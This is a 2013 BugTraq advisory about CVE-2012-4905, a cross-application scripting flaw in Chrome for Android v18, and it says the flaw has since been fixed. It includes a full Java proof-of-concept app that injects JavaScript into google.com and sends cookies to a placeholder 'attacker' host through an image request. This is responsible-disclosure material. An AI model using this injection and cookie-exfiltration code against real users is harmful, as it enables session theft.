BugTraq
Chrome for Android - UXSS via com.android.browser.application_id Intent extra Jan 07 2013 01:23PM
mbsdtest01 gmail com
CVE Number: CVE-2012-4905
Title: Chrome for Android - UXSS via com.android.browser.application_id Intent extra
Affected Software: Confirmed on Chrome for Android v18.0.1025123
Credit: Takeshi Terada
Issue Status: v18.0.1025308 was released which fixes this vulnerability

Overview:
By sending a crafted Intent to Chrome for Android, malicious Android apps can
inject javascript into arbitrary Web pages rendered in Chrome. Such kind of
UXSS-like vulnerabilities is often called Cross-Application Scripting.

Details:
When other Android apps send an Intent with javascript: URI to Chrome for
Android (v18.0.1025123), Chrome opens a new tab and execute the JavaScript
code in the context of the blank domain. Probably this is a countermeasure
against UXSS attacks.

However, this can be bypassed by an Intent with Extra data as below:

intent.putExtra("com.android.browser.application_id", "com.android.chrome");

With an Intent that contains such Extra data, Chrome loads javascript: URI
(written in the Intent) in the current foreground tab, not in a blank tab.

This enables malicious Android apps to execute arbitrary JavaScript code in
arbitrary domains on Chrome. As a result, other apps are able to steal Cookies
and so on.

Proof of Concept:
package jp.mbsd.terada.attackchrome1;

import android.app.Activity;
import android.os.Bundle;
import android.content.Intent;
import android.net.Uri;

public class Main extends Activity {
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.main);
doit();
}

// get intent to invoke the chrome app
public Intent getIntentForChrome(String url) {
Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main");
intent.setData(Uri.parse(url));
return intent;
}

public void doit() {
try {
// At first, force the chrome app to open a target Web page
Intent intent1 = getIntentForChrome("http://www.google.com/1");
startActivity(intent1);

// wait a few seconds
Thread.sleep(3000);

// JS code to inject into the target (www.google.com)
String jsURL = "javascript:var e=encodeURIComponent,img=document.createElement('img');"
+ "img.src='http://attacker/?c='+e(document.cookie)+'&d='+e(document.domai
n);"
+ "document.body.appendChild(img);";

Intent intent2 = getIntentForChrome(jsURL);

// Trick to prevent Chrome from opening the JS URL in a different tab
intent2.putExtra("com.android.browser.application_id", "com.android.chrome");
intent2.addFlags(Intent.FLAG_ACTIVITY_SINGLE_TOP);

// Inject JS into the target Web page
startActivity(intent2);
}
catch (Exception e) {}
}
}

Timeline:
2012/07/07 Reported to Google security team.
2012/09/12 Vender announced v18.0.1025308
2013/01/07 Disclosure of this advisory

Recommendation:
Upgrade to the latest version.

Reference:
http://googlechromereleases.blogspot.jp/2012/09/chrome-for-android-updat
e.html
https://code.google.com/p/chromium/issues/detail?id=144813

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus